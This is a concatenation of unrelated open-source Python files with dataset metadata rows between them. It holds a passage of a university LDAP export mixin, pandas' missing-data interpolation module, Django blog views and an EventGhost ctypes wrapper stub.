If True, Cerebrum.modules.Email will be used to populate this
cache; otherwise the `self.account_mail` dict will be None.
"""
super(OrgLDIFUiOMixin, self).init_account_mail(use_mail_module)
if use_mail_module:
timer = make_timer(
self.logger,
"Doing UiO specific changes to account e-mail addresses...")
self.account_primary_mail = self.account_mail.copy()
# We don't want to import this if mod_email isn't present.
from Cerebrum.modules.Email import EmailTarget
targets = EmailTarget(self.db).list_email_target_addresses
mail = {}
for row in targets(target_type=self.const.email_target_account,
domain='uio.no', uname_local=True):
# Can only return username@uio.no so no need for any checks
mail[int(row['target_entity_id'])] = "@".join(
(row['local_part'], row['domain']))
self.account_mail.update(mail)
timer("...UiO specfic account e-mail addresses done.")
def make_uioPersonScopedAffiliation(self, p_id, pri_aff, pri_ou):
        # [primary|secondary]:<affiliation>/<status>@<stedkode>
ret = []
pri_aff_str, pri_status_str = pri_aff
for aff, status, ou in self.affiliations[p_id]:
# populate the caches
if aff in self.aff_cache:
aff_str = self.aff_cache[aff]
else:
aff_str = str(self.const.PersonAffiliation(aff))
self.aff_cache[aff] = aff_str
if status in self.status_cache:
status_str = self.status_cache[status]
else:
status_str = str(self.const.PersonAffStatus(status).str)
self.status_cache[status] = status_str
p = 'secondary'
if (aff_str == pri_aff_str and
status_str == pri_status_str and ou == pri_ou):
p = 'primary'
ou = self.ou_id2ou_uniq_id[ou]
if ou:
ret.append(''.join((p, ':', aff_str, '/', status_str, '@',
ou)))
return ret
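    # Illustrative example of the produced values (the affiliation, status
    # and stedkode below are made up); each element has the form
    # [primary|secondary]:<affiliation>/<status>@<stedkode>:
    #
    #     ['primary:ANSATT/tekadm@150000',
    #      'secondary:STUDENT/aktiv@140000']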
def make_person_entry(self, row, person_id):
""" Extend with UiO functionality. """
dn, entry, alias_info = self.__super.make_person_entry(row, person_id)
account_id = int(row['account_id'])
if not dn:
return dn, entry, alias_info
# Add or extend entitlements
if person_id in self.ownerid2urnlist:
urnlist = self.ownerid2urnlist[person_id]
if 'eduPersonEntitlement' in entry:
entry['eduPersonEntitlement'].update(urnlist)
else:
entry['eduPersonEntitlement'] = set(urnlist)
# Add person ID
entry['uioPersonId'] = str(person_id)
# Add group memberships
if person_id in self.person2group:
entry['uioMemberOf'] = self.person2group[person_id]
entry['objectClass'].append('uioMembership')
# Add scoped affiliations
pri_edu_aff, pri_ou, pri_aff = self.make_eduPersonPrimaryAffiliation(
person_id)
entry['uioPersonScopedAffiliation'] = \
self.make_uioPersonScopedAffiliation(person_id, pri_aff, pri_ou)
# uio attributes require uioPersonObject
entry['objectClass'].append('uioPersonObject')
        # Check if there exist «avvikende» (deviant) addresses.
# If so, export them instead.
addrs = self.addr_info.get(person_id)
post = addrs and addrs.get(int(self.const.address_other_post))
if post:
a_txt, p_o_box, p_num, city, country = post
post = self.make_address("$", p_o_box, a_txt, p_num, city, country)
if post:
entry['postalAddress'] = (post,)
street = addrs and addrs.get(int(self.const.address_other_street))
if street:
a_txt, p_o_box, p_num, city, country = street
street = self.make_address(", ", None, a_txt, p_num, city, country)
if street:
entry['street'] = (street,)
if self.account_primary_mail:
mail = self.account_primary_mail.get(account_id)
if mail:
entry['uioPrimaryMail'] = mail
return dn, entry, alias_info
def _calculate_edu_OUs(self, p_ou, s_ous):
return s_ous
def init_person_selections(self, *args, **kwargs):
""" Extend with UiO settings for person selections.
        This is especially for `no.uio.OrgLDIF.is_person_visible()`, as UiO has
        special needs in how to interpret the visibility of persons, due to
        affiliations for reservation and consent, which behave differently in
        SAPUiO and FS.
"""
self.__super.init_person_selections(*args, **kwargs)
        # Set which affiliations should be checked for visibility from SAP
        # and FS. The default is to set the person to NOT visible, which
        # happens for all persons that don't have _any_ of the affiliations
        # defined here.
self.visible_sap_affs = (int(self.const.affiliation_ansatt),)
tilkn_aff = int(self.const.affiliation_tilknyttet)
self.visible_sap_statuses = (
(tilkn_aff, int(self.const.affiliation_tilknyttet_ekst_stip)),
(tilkn_aff, int(self.const.affiliation_tilknyttet_frida_reg)),
(tilkn_aff, int(self.const.affiliation_tilknyttet_innkjoper)),
(tilkn_aff, int(self.const.
affiliation_tilknyttet_assosiert_person)),
(tilkn_aff, int(self.const.affiliation_tilknyttet_ekst_forsker)),
(tilkn_aff, int(self.const.affiliation_tilknyttet_emeritus)),
(tilkn_aff, int(self.const.affiliation_tilknyttet_gjesteforsker)),
(tilkn_aff, int(self.const.affiliation_tilknyttet_bilag)),
(tilkn_aff, int(self.const.affiliation_tilknyttet_ekst_partner)),
)
student = int(self.const.affiliation_student)
self.fs_aff_statuses = (
(student, int(self.const.affiliation_status_student_aktiv)),
(student, int(self.const.affiliation_status_student_drgrad)),
(student, int(self.const.affiliation_status_student_emnestud)))
self.sap_res = self.init_person_group("SAP-elektroniske-reservasjoner")
self.fs_samtykke = self.init_person_group("FS-aktivt-samtykke")
def is_person_visible(self, person_id):
""" Override with UiO specific visibility.
At UiO, visibility is controlled differently depending on what source
system the person is from. SAPUiO has reservations, while FS has active
consents. Since we don't fetch source systems per affiliation from
Cerebrum in `OrgLDIF`, we only guess.
        The reason for this override is to support priorities: SAP has priority
        over FS, which can't be implemented through the configuration as of
        today.
        Note that the settings in `cereconf.LDAP_PERSON['visible_selector']` are
        ignored by this override. The list of affiliations is hardcoded in the
        method `init_person_selections`.
"""
# TODO: this could be changed to check the trait 'reserve_public'
# later, so we don't have to check group memberships.
#
# The trait behaves in the following manner:
# Every person should be 'invisible', except if:
# * The person has a trait of the type 'reserve_public', and
# * The trait's numval is set to 0
# This means that a missing trait should be considered as a
# reservation.
p_affs = self.affiliations[person_id]
# If there is an affiliation from SAP then consider
# reservations/permissions from SAP only.
for (aff, status, ou) in p_affs:
if aff in self.visible_sap_affs:
return person_id not in self.sap_res
if (aff, status) in self.visible_sap_statuses:
return person_id not in self.sap_res
        # Otherwise, if there is an affiliation STUDENT/<aktiv, emnestud or drgrad>,
# check for permission from FS to make the person visible.
for (aff, status, ou) in p_affs:
if (aff, status) in self.fs_aff_statuses:
return person_id in self.fs_samtykke
# Otherwise hide the person.
return False
|
gpl-2.0
| -9,183,215,164,680,836,000
| 43.69914
| 83
| 0.604744
| false
| 3.762663
| false
| false
| false
|
cbertinato/pandas
|
pandas/core/missing.py
|
1
|
23588
|
"""
Routines for filling missing data.
"""
import operator
import numpy as np
from pandas._libs import algos, lib
from pandas.compat._optional import import_optional_dependency
from pandas.core.dtypes.cast import infer_dtype_from_array
from pandas.core.dtypes.common import (
ensure_float64, is_datetime64_dtype, is_datetime64tz_dtype, is_float_dtype,
is_integer, is_integer_dtype, is_numeric_v_string_like, is_scalar,
is_timedelta64_dtype, needs_i8_conversion)
from pandas.core.dtypes.missing import isna
def mask_missing(arr, values_to_mask):
"""
    Return a masking array of the same size/shape as arr
    with entries set to True where they equal any member of values_to_mask
"""
dtype, values_to_mask = infer_dtype_from_array(values_to_mask)
try:
values_to_mask = np.array(values_to_mask, dtype=dtype)
except Exception:
values_to_mask = np.array(values_to_mask, dtype=object)
na_mask = isna(values_to_mask)
nonna = values_to_mask[~na_mask]
mask = None
for x in nonna:
if mask is None:
# numpy elementwise comparison warning
if is_numeric_v_string_like(arr, x):
mask = False
else:
mask = arr == x
# if x is a string and arr is not, then we get False and we must
# expand the mask to size arr.shape
if is_scalar(mask):
mask = np.zeros(arr.shape, dtype=bool)
else:
# numpy elementwise comparison warning
if is_numeric_v_string_like(arr, x):
mask |= False
else:
mask |= arr == x
if na_mask.any():
if mask is None:
mask = isna(arr)
else:
mask |= isna(arr)
# GH 21977
if mask is None:
mask = np.zeros(arr.shape, dtype=bool)
return mask
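# A hedged usage sketch (hypothetical values, not part of the original module):
#   >>> mask_missing(np.array([1.0, 2.0, np.nan]), [2.0, np.nan])
#   array([False,  True,  True])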
def clean_fill_method(method, allow_nearest=False):
# asfreq is compat for resampling
if method in [None, 'asfreq']:
return None
if isinstance(method, str):
method = method.lower()
if method == 'ffill':
method = 'pad'
elif method == 'bfill':
method = 'backfill'
valid_methods = ['pad', 'backfill']
expecting = 'pad (ffill) or backfill (bfill)'
if allow_nearest:
valid_methods.append('nearest')
expecting = 'pad (ffill), backfill (bfill) or nearest'
if method not in valid_methods:
msg = ('Invalid fill method. Expecting {expecting}. Got {method}'
.format(expecting=expecting, method=method))
raise ValueError(msg)
return method
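# A hedged usage sketch (not part of the original module):
#   >>> clean_fill_method('ffill')
#   'pad'
#   >>> clean_fill_method('bfill')
#   'backfill'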
def clean_interp_method(method, **kwargs):
order = kwargs.get('order')
valid = ['linear', 'time', 'index', 'values', 'nearest', 'zero', 'slinear',
'quadratic', 'cubic', 'barycentric', 'polynomial', 'krogh',
'piecewise_polynomial', 'pchip', 'akima', 'spline',
'from_derivatives']
if method in ('spline', 'polynomial') and order is None:
raise ValueError("You must specify the order of the spline or "
"polynomial.")
if method not in valid:
raise ValueError("method must be one of {valid}. Got '{method}' "
"instead.".format(valid=valid, method=method))
return method
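# A hedged usage sketch (not part of the original module):
#   >>> clean_interp_method('pchip')
#   'pchip'
#   >>> clean_interp_method('spline', order=3)
#   'spline'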
def interpolate_1d(xvalues, yvalues, method='linear', limit=None,
limit_direction='forward', limit_area=None, fill_value=None,
bounds_error=False, order=None, **kwargs):
"""
    Logic for 1-d interpolation. The result should be 1-d; the inputs
    xvalues and yvalues will each be 1-d arrays of the same length.
    bounds_error is currently hardcoded to False since the non-scipy
    interpolators don't take it as an argument.
"""
# Treat the original, non-scipy methods first.
invalid = isna(yvalues)
valid = ~invalid
if not valid.any():
# have to call np.asarray(xvalues) since xvalues could be an Index
# which can't be mutated
result = np.empty_like(np.asarray(xvalues), dtype=np.float64)
result.fill(np.nan)
return result
if valid.all():
return yvalues
if method == 'time':
if not getattr(xvalues, 'is_all_dates', None):
# if not issubclass(xvalues.dtype.type, np.datetime64):
raise ValueError('time-weighted interpolation only works '
'on Series or DataFrames with a '
'DatetimeIndex')
method = 'values'
valid_limit_directions = ['forward', 'backward', 'both']
limit_direction = limit_direction.lower()
if limit_direction not in valid_limit_directions:
msg = ('Invalid limit_direction: expecting one of {valid!r}, '
'got {invalid!r}.')
raise ValueError(msg.format(valid=valid_limit_directions,
invalid=limit_direction))
if limit_area is not None:
valid_limit_areas = ['inside', 'outside']
limit_area = limit_area.lower()
if limit_area not in valid_limit_areas:
raise ValueError('Invalid limit_area: expecting one of {}, got '
'{}.'.format(valid_limit_areas, limit_area))
# default limit is unlimited GH #16282
if limit is None:
# limit = len(xvalues)
pass
elif not is_integer(limit):
raise ValueError('Limit must be an integer')
elif limit < 1:
raise ValueError('Limit must be greater than 0')
from pandas import Series
ys = Series(yvalues)
# These are sets of index pointers to invalid values... i.e. {0, 1, etc...
all_nans = set(np.flatnonzero(invalid))
start_nans = set(range(ys.first_valid_index()))
end_nans = set(range(1 + ys.last_valid_index(), len(valid)))
mid_nans = all_nans - start_nans - end_nans
# Like the sets above, preserve_nans contains indices of invalid values,
# but in this case, it is the final set of indices that need to be
# preserved as NaN after the interpolation.
# For example if limit_direction='forward' then preserve_nans will
# contain indices of NaNs at the beginning of the series, and NaNs that
    # are more than 'limit' away from the prior non-NaN.
# set preserve_nans based on direction using _interp_limit
if limit_direction == 'forward':
preserve_nans = start_nans | set(_interp_limit(invalid, limit, 0))
elif limit_direction == 'backward':
preserve_nans = end_nans | set(_interp_limit(invalid, 0, limit))
else:
# both directions... just use _interp_limit
preserve_nans = set(_interp_limit(invalid, limit, limit))
# if limit_area is set, add either mid or outside indices
# to preserve_nans GH #16284
if limit_area == 'inside':
# preserve NaNs on the outside
preserve_nans |= start_nans | end_nans
elif limit_area == 'outside':
# preserve NaNs on the inside
preserve_nans |= mid_nans
    # sort preserve_nans and convert to list
preserve_nans = sorted(preserve_nans)
xvalues = getattr(xvalues, 'values', xvalues)
yvalues = getattr(yvalues, 'values', yvalues)
result = yvalues.copy()
if method in ['linear', 'time', 'index', 'values']:
if method in ('values', 'index'):
inds = np.asarray(xvalues)
# hack for DatetimeIndex, #1646
if needs_i8_conversion(inds.dtype.type):
inds = inds.view(np.int64)
if inds.dtype == np.object_:
inds = lib.maybe_convert_objects(inds)
else:
inds = xvalues
result[invalid] = np.interp(inds[invalid], inds[valid], yvalues[valid])
result[preserve_nans] = np.nan
return result
sp_methods = ['nearest', 'zero', 'slinear', 'quadratic', 'cubic',
'barycentric', 'krogh', 'spline', 'polynomial',
'from_derivatives', 'piecewise_polynomial', 'pchip', 'akima']
if method in sp_methods:
inds = np.asarray(xvalues)
# hack for DatetimeIndex, #1646
if issubclass(inds.dtype.type, np.datetime64):
inds = inds.view(np.int64)
result[invalid] = _interpolate_scipy_wrapper(inds[valid],
yvalues[valid],
inds[invalid],
method=method,
fill_value=fill_value,
bounds_error=bounds_error,
order=order, **kwargs)
result[preserve_nans] = np.nan
return result
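# A hedged usage sketch (hypothetical values, not part of the original module);
# with the default forward limit_direction, NaNs further than `limit` past the
# previous valid value stay NaN:
#   interpolate_1d(np.arange(5), np.array([0.0, np.nan, np.nan, 3.0, 4.0]), limit=1)
#   -> array([0., 1., nan, 3., 4.])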
def _interpolate_scipy_wrapper(x, y, new_x, method, fill_value=None,
bounds_error=False, order=None, **kwargs):
"""
Passed off to scipy.interpolate.interp1d. method is scipy's kind.
Returns an array interpolated at new_x. Add any new methods to
    the list in clean_interp_method.
"""
extra = '{method} interpolation requires SciPy.'.format(method=method)
import_optional_dependency('scipy', extra=extra)
from scipy import interpolate
new_x = np.asarray(new_x)
# ignores some kwargs that could be passed along.
alt_methods = {
'barycentric': interpolate.barycentric_interpolate,
'krogh': interpolate.krogh_interpolate,
'from_derivatives': _from_derivatives,
'piecewise_polynomial': _from_derivatives,
}
if getattr(x, 'is_all_dates', False):
        # GH 5975, scipy.interp1d can't handle datetime64s
x, new_x = x._values.astype('i8'), new_x.astype('i8')
if method == 'pchip':
try:
alt_methods['pchip'] = interpolate.pchip_interpolate
except AttributeError:
raise ImportError("Your version of Scipy does not support "
"PCHIP interpolation.")
elif method == 'akima':
alt_methods['akima'] = _akima_interpolate
interp1d_methods = ['nearest', 'zero', 'slinear', 'quadratic', 'cubic',
'polynomial']
if method in interp1d_methods:
if method == 'polynomial':
method = order
terp = interpolate.interp1d(x, y, kind=method, fill_value=fill_value,
bounds_error=bounds_error)
new_y = terp(new_x)
elif method == 'spline':
# GH #10633, #24014
if isna(order) or (order <= 0):
raise ValueError("order needs to be specified and greater than 0; "
"got order: {}".format(order))
terp = interpolate.UnivariateSpline(x, y, k=order, **kwargs)
new_y = terp(new_x)
else:
# GH 7295: need to be able to write for some reason
# in some circumstances: check all three
if not x.flags.writeable:
x = x.copy()
if not y.flags.writeable:
y = y.copy()
if not new_x.flags.writeable:
new_x = new_x.copy()
method = alt_methods[method]
new_y = method(x, y, new_x, **kwargs)
return new_y
def _from_derivatives(xi, yi, x, order=None, der=0, extrapolate=False):
"""
Convenience function for interpolate.BPoly.from_derivatives.
Construct a piecewise polynomial in the Bernstein basis, compatible
with the specified values and derivatives at breakpoints.
Parameters
----------
xi : array_like
sorted 1D array of x-coordinates
yi : array_like or list of array-likes
yi[i][j] is the j-th derivative known at xi[i]
order: None or int or array_like of ints. Default: None.
Specifies the degree of local polynomials. If not None, some
derivatives are ignored.
der : int or list
How many derivatives to extract; None for all potentially nonzero
derivatives (that is a number equal to the number of points), or a
list of derivatives to extract. This numberincludes the function
value as 0th derivative.
extrapolate : bool, optional
        Whether to extrapolate to out-of-bounds points based on first and last
        intervals, or to return NaNs. Default: False.
See Also
--------
scipy.interpolate.BPoly.from_derivatives
Returns
-------
y : scalar or array_like
The result, of length R or length M or M by R.
"""
from scipy import interpolate
# return the method for compat with scipy version & backwards compat
method = interpolate.BPoly.from_derivatives
m = method(xi, yi.reshape(-1, 1),
orders=order, extrapolate=extrapolate)
return m(x)
def _akima_interpolate(xi, yi, x, der=0, axis=0):
"""
Convenience function for akima interpolation.
xi and yi are arrays of values used to approximate some function f,
with ``yi = f(xi)``.
See `Akima1DInterpolator` for details.
Parameters
----------
xi : array_like
A sorted list of x-coordinates, of length N.
yi : array_like
A 1-D array of real values. `yi`'s length along the interpolation
axis must be equal to the length of `xi`. If N-D array, use axis
parameter to select correct axis.
x : scalar or array_like
Of length M.
der : int or list, optional
How many derivatives to extract; None for all potentially
nonzero derivatives (that is a number equal to the number
of points), or a list of derivatives to extract. This number
includes the function value as 0th derivative.
axis : int, optional
Axis in the yi array corresponding to the x-coordinate values.
See Also
--------
scipy.interpolate.Akima1DInterpolator
Returns
-------
y : scalar or array_like
        The result, of length R or length M or M by R.
"""
from scipy import interpolate
P = interpolate.Akima1DInterpolator(xi, yi, axis=axis)
if der == 0:
return P(x)
elif interpolate._isscalar(der):
return P(x, der=der)
else:
return [P(x, nu) for nu in der]
def interpolate_2d(values, method='pad', axis=0, limit=None, fill_value=None,
dtype=None):
"""
    Perform an actual interpolation of values; values will be made 2-d if
    needed. Fills in place and returns the result.
"""
transf = (lambda x: x) if axis == 0 else (lambda x: x.T)
# reshape a 1 dim if needed
ndim = values.ndim
if values.ndim == 1:
if axis != 0: # pragma: no cover
raise AssertionError("cannot interpolate on a ndim == 1 with "
"axis != 0")
values = values.reshape(tuple((1,) + values.shape))
if fill_value is None:
mask = None
else: # todo create faster fill func without masking
mask = mask_missing(transf(values), fill_value)
method = clean_fill_method(method)
if method == 'pad':
values = transf(pad_2d(
transf(values), limit=limit, mask=mask, dtype=dtype))
else:
values = transf(backfill_2d(
transf(values), limit=limit, mask=mask, dtype=dtype))
# reshape back
if ndim == 1:
values = values[0]
return values
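# A hedged usage sketch (hypothetical values, not part of the original module):
#   interpolate_2d(np.array([1.0, np.nan, np.nan, 4.0]), method='pad', limit=1)
#   -> array([1., 1., nan, 4.])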
def _cast_values_for_fillna(values, dtype):
"""
Cast values to a dtype that algos.pad and algos.backfill can handle.
"""
# TODO: for int-dtypes we make a copy, but for everything else this
# alters the values in-place. Is this intentional?
if (is_datetime64_dtype(dtype) or is_datetime64tz_dtype(dtype) or
is_timedelta64_dtype(dtype)):
values = values.view(np.int64)
elif is_integer_dtype(values):
# NB: this check needs to come after the datetime64 check above
values = ensure_float64(values)
return values
def _fillna_prep(values, mask=None, dtype=None):
# boilerplate for pad_1d, backfill_1d, pad_2d, backfill_2d
if dtype is None:
dtype = values.dtype
if mask is None:
# This needs to occur before datetime/timedeltas are cast to int64
mask = isna(values)
values = _cast_values_for_fillna(values, dtype)
mask = mask.view(np.uint8)
return values, mask
def pad_1d(values, limit=None, mask=None, dtype=None):
values, mask = _fillna_prep(values, mask, dtype)
algos.pad_inplace(values, mask, limit=limit)
return values
def backfill_1d(values, limit=None, mask=None, dtype=None):
values, mask = _fillna_prep(values, mask, dtype)
algos.backfill_inplace(values, mask, limit=limit)
return values
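# A hedged usage sketch (hypothetical values, not part of the original module):
#   pad_1d(np.array([np.nan, 1.0, np.nan, 3.0]))      -> array([nan, 1., 1., 3.])
#   backfill_1d(np.array([np.nan, 1.0, np.nan, 3.0])) -> array([1., 1., 3., 3.])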
def pad_2d(values, limit=None, mask=None, dtype=None):
values, mask = _fillna_prep(values, mask, dtype)
if np.all(values.shape):
algos.pad_2d_inplace(values, mask, limit=limit)
else:
# for test coverage
pass
return values
def backfill_2d(values, limit=None, mask=None, dtype=None):
values, mask = _fillna_prep(values, mask, dtype)
if np.all(values.shape):
algos.backfill_2d_inplace(values, mask, limit=limit)
else:
# for test coverage
pass
return values
_fill_methods = {'pad': pad_1d, 'backfill': backfill_1d}
def get_fill_func(method):
method = clean_fill_method(method)
return _fill_methods[method]
def clean_reindex_fill_method(method):
return clean_fill_method(method, allow_nearest=True)
def fill_zeros(result, x, y, name, fill):
"""
    If this is a reversed op, then flip x and y.
    If we have an integer value (or array) in y
    and it contains 0's, fill them with the fill value
    and return the result.
    Mask the NaNs from x.
"""
if fill is None or is_float_dtype(result):
return result
if name.startswith(('r', '__r')):
x, y = y, x
is_variable_type = (hasattr(y, 'dtype') or hasattr(y, 'type'))
is_scalar_type = is_scalar(y)
if not is_variable_type and not is_scalar_type:
return result
if is_scalar_type:
y = np.array(y)
if is_integer_dtype(y):
if (y == 0).any():
# GH 7325, mask and nans must be broadcastable (also: PR 9308)
# Raveling and then reshaping makes np.putmask faster
mask = ((y == 0) & ~np.isnan(result)).ravel()
shape = result.shape
result = result.astype('float64', copy=False).ravel()
np.putmask(result, mask, fill)
# if we have a fill of inf, then sign it correctly
# (GH 6178 and PR 9308)
if np.isinf(fill):
signs = y if name.startswith(('r', '__r')) else x
signs = np.sign(signs.astype('float', copy=False))
negative_inf_mask = (signs.ravel() < 0) & mask
np.putmask(result, negative_inf_mask, -fill)
if "floordiv" in name: # (PR 9308)
nan_mask = ((y == 0) & (x == 0)).ravel()
np.putmask(result, nan_mask, np.nan)
result = result.reshape(shape)
return result
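# A hedged usage sketch (hypothetical values, not part of the original module);
# integer division by zero gets patched with +/-inf, and 0 // 0 with NaN:
#   x, y = np.array([1, 0], dtype=np.int64), np.array([0, 0], dtype=np.int64)
#   fill_zeros(np.array([0, 0]), x, y, 'floordiv', np.inf)
#   -> array([inf, nan])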
def mask_zero_div_zero(x, y, result, copy=False):
"""
Set results of 0 / 0 or 0 // 0 to np.nan, regardless of the dtypes
of the numerator or the denominator.
Parameters
----------
x : ndarray
y : ndarray
result : ndarray
copy : bool (default False)
Whether to always create a new array or try to fill in the existing
array if possible.
Returns
-------
filled_result : ndarray
Examples
--------
>>> x = np.array([1, 0, -1], dtype=np.int64)
>>> y = 0 # int 0; numpy behavior is different with float
>>> result = x / y
>>> result # raw numpy result does not fill division by zero
array([0, 0, 0])
>>> mask_zero_div_zero(x, y, result)
array([ inf, nan, -inf])
"""
if is_scalar(y):
y = np.array(y)
zmask = y == 0
if zmask.any():
shape = result.shape
nan_mask = (zmask & (x == 0)).ravel()
neginf_mask = (zmask & (x < 0)).ravel()
posinf_mask = (zmask & (x > 0)).ravel()
if nan_mask.any() or neginf_mask.any() or posinf_mask.any():
# Fill negative/0 with -inf, positive/0 with +inf, 0/0 with NaN
result = result.astype('float64', copy=copy).ravel()
np.putmask(result, nan_mask, np.nan)
np.putmask(result, posinf_mask, np.inf)
np.putmask(result, neginf_mask, -np.inf)
result = result.reshape(shape)
return result
def dispatch_missing(op, left, right, result):
"""
Fill nulls caused by division by zero, casting to a different dtype
if necessary.
Parameters
----------
op : function (operator.add, operator.div, ...)
left : object (Index for non-reversed ops)
    right : object (Index for reversed ops)
result : ndarray
Returns
-------
result : ndarray
"""
opstr = '__{opname}__'.format(opname=op.__name__).replace('____', '__')
if op in [operator.truediv, operator.floordiv,
getattr(operator, 'div', None)]:
result = mask_zero_div_zero(left, right, result)
elif op is operator.mod:
result = fill_zeros(result, left, right, opstr, np.nan)
elif op is divmod:
res0 = mask_zero_div_zero(left, right, result[0])
res1 = fill_zeros(result[1], left, right, opstr, np.nan)
result = (res0, res1)
return result
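# A hedged usage sketch (hypothetical values, not part of the original module):
#   dispatch_missing(operator.truediv,
#                    np.array([1, 0, -1]), np.array([0, 0, 0]),
#                    np.array([0., 0., 0.]))
#   -> array([ inf,  nan, -inf])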
def _interp_limit(invalid, fw_limit, bw_limit):
"""
Get indexers of values that won't be filled
because they exceed the limits.
Parameters
----------
invalid : boolean ndarray
fw_limit : int or None
forward limit to index
bw_limit : int or None
backward limit to index
Returns
-------
set of indexers
Notes
-----
This is equivalent to the more readable, but slower
.. code-block:: python
def _interp_limit(invalid, fw_limit, bw_limit):
for x in np.where(invalid)[0]:
if invalid[max(0, x - fw_limit):x + bw_limit + 1].all():
yield x
"""
# handle forward first; the backward direction is the same except
# 1. operate on the reversed array
# 2. subtract the returned indices from N - 1
N = len(invalid)
f_idx = set()
b_idx = set()
def inner(invalid, limit):
limit = min(limit, N)
windowed = _rolling_window(invalid, limit + 1).all(1)
idx = (set(np.where(windowed)[0] + limit) |
set(np.where((~invalid[:limit + 1]).cumsum() == 0)[0]))
return idx
if fw_limit is not None:
if fw_limit == 0:
f_idx = set(np.where(invalid)[0])
else:
f_idx = inner(invalid, fw_limit)
if bw_limit is not None:
if bw_limit == 0:
# then we don't even need to care about backwards
# just use forwards
return f_idx
else:
b_idx = list(inner(invalid[::-1], bw_limit))
b_idx = set(N - 1 - np.asarray(b_idx))
if fw_limit == 0:
return b_idx
return f_idx & b_idx
def _rolling_window(a, window):
"""
[True, True, False, True, False], 2 ->
[
[True, True],
[True, False],
[False, True],
[True, False],
]
"""
# https://stackoverflow.com/a/6811241
shape = a.shape[:-1] + (a.shape[-1] - window + 1, window)
strides = a.strides + (a.strides[-1],)
return np.lib.stride_tricks.as_strided(a, shape=shape, strides=strides)
|
bsd-3-clause
| -1,535,343,801,592,295,700
| 31.445667
| 79
| 0.588265
| false
| 3.814977
| false
| false
| false
|
GMadorell/djagolb
|
src/blog/views.py
|
1
|
4684
|
from collections import OrderedDict, Iterable
import pdb
from django.contrib.sites.models import Site
from django.http import Http404
from django.views import generic
from django.views.generic.base import ContextMixin
from .models import BlogPostModel, Author, Tag
class AuthorContextMixin(ContextMixin):
author_model = Author
def get_context_data(self, **kwargs):
context = super(AuthorContextMixin, self).get_context_data(**kwargs)
context["author"] = self.author_model.objects.all()[0]
return context
class SiteContextMixin(ContextMixin):
def get_context_data(self, **kwargs):
context = super(SiteContextMixin, self).get_context_data(**kwargs)
context["site"] = Site.objects.all()[0]
return context
class BlogIndexView(
AuthorContextMixin,
SiteContextMixin,
generic.ListView
):
template_name = "blog/blog_index.html"
model = BlogPostModel
POSTS_PER_PAGE = 3
def get_queryset(self):
self.validate_correct_page()
return self.model.objects.order_by("-posted_at")[
self.get_starting_index():self.get_ending_index()]
def get_context_data(self, **kwargs):
self.validate_correct_page()
context = super(BlogIndexView, self).get_context_data(**kwargs)
context["has_older_posts"] = \
self.get_ending_index() < self.get_amount_posts()
context["has_newer_posts"] = self.get_starting_index() > 0
context["page"] = self.kwargs.get("page")
return context
def validate_correct_page(self):
if self.get_page() < 1:
raise Http404
if self.get_starting_index() > self.get_amount_posts():
raise Http404
def get_page(self):
return int(self.kwargs.get("page"))
def get_amount_posts(self):
return self.model.objects.count()
def get_starting_index(self):
return (self.get_page() - 1) * self.POSTS_PER_PAGE
def get_ending_index(self):
return self.get_starting_index() + self.POSTS_PER_PAGE
class BlogPostDetail(
AuthorContextMixin,
SiteContextMixin,
generic.DetailView,
):
template_name = "blog/blogpost.html"
context_object_name = "blogpost"
model = BlogPostModel
class ArchiveView(
AuthorContextMixin,
generic.TemplateView,
):
template_name = "blog/archive.html"
def get_context_data(self, **kwargs):
context = super(ArchiveView, self).get_context_data(**kwargs)
archive = OrderedDict()
posted_at_values = \
BlogPostModel.objects.order_by("-posted_at") \
.values_list("posted_at", flat=True)
        # Make sure values are unique and ordered from high to low.
years = sorted(
list(set(map(lambda posted_at: posted_at.year, posted_at_values))),
reverse=True)
for year in years:
year_dic = OrderedDict()
posted_at_year = \
BlogPostModel.objects.filter(posted_at__year=year) \
.order_by("-posted_at") \
.values_list("posted_at", flat=True)
months = sorted(list(
set(map(lambda posted_at: posted_at.month, posted_at_year))),
reverse=True)
for month in months:
month_dic = OrderedDict()
posted_at_year_month = \
BlogPostModel.objects.filter(posted_at__year=year) \
.filter(posted_at__month=month) \
.order_by("-posted_at") \
.values_list("posted_at", flat=True)
days = sorted(list(set(map(lambda posted_at: posted_at.day,
posted_at_year_month))),
reverse=True)
for day in days:
blogposts_at_day = \
BlogPostModel.objects.filter(posted_at__year=year) \
.filter(posted_at__month=month) \
.filter(posted_at__day=day) \
.order_by("-posted_at")
month_dic[day] = list(blogposts_at_day)
year_dic[month] = month_dic
archive[year] = year_dic
context["archive"] = archive
context["test"] = BlogPostModel.objects.all()
return context
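    # A hedged sketch (hypothetical dates, not part of the original module) of
    # the de-duplicate-and-sort idiom used above:
    #   >>> import datetime
    #   >>> dates = [datetime.date(2014, 5, 1), datetime.date(2013, 1, 2)]
    #   >>> sorted(set(map(lambda d: d.year, dates)), reverse=True)
    #   [2014, 2013]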
class AboutView(
generic.TemplateView,
AuthorContextMixin,
):
template_name = "blog/about.html"
class TagView(
generic.ListView,
AuthorContextMixin,
):
model = Tag
template_name = "blog/tags.html"
context_object_name = "tags"
|
mit
| 9,116,562,323,284,935,000
| 29.415584
| 79
| 0.583262
| false
| 3.982993
| false
| false
| false
|
WoLpH/EventGhost
|
eg/WinApi/Dynamic/Mmsystem.py
|
1
|
11993
|
# -*- coding: utf-8 -*-
#
# This file is part of EventGhost.
# Copyright © 2005-2016 EventGhost Project <http://www.eventghost.net/>
#
# EventGhost is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 2 of the License, or (at your option)
# any later version.
#
# EventGhost is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along
# with EventGhost. If not, see <http://www.gnu.org/licenses/>.
#pylint: disable-msg=C0103,C0301,C0302
# This file gets automatically extended by ctypeslib.dynamic_module, so don't
# edit it yourself.
import sys
# Local imports
from eg.WinApi.Dynamic import *
_Winmm = WinDLL("Winmm")
if __name__ == "__main__":
try:
ctypeslib = __import__("ctypeslib.dynamic_module")
except ImportError:
print "ctypeslib is not installed!"
else:
try:
ctypeslib.dynamic_module.include(
"#define UNICODE\n"
"#define _WIN32_WINNT 0x500\n"
"#define WIN32_LEAN_AND_MEAN\n"
"#define NO_STRICT\n"
"#include <windows.h>\n"
"#include <Mmsystem.h>\n"
)
except WindowsError:
print "GCC_XML most likely not installed"
#-----------------------------------------------------------------------------#
# everything after the following line is automatically created
#-----------------------------------------------------------------------------#
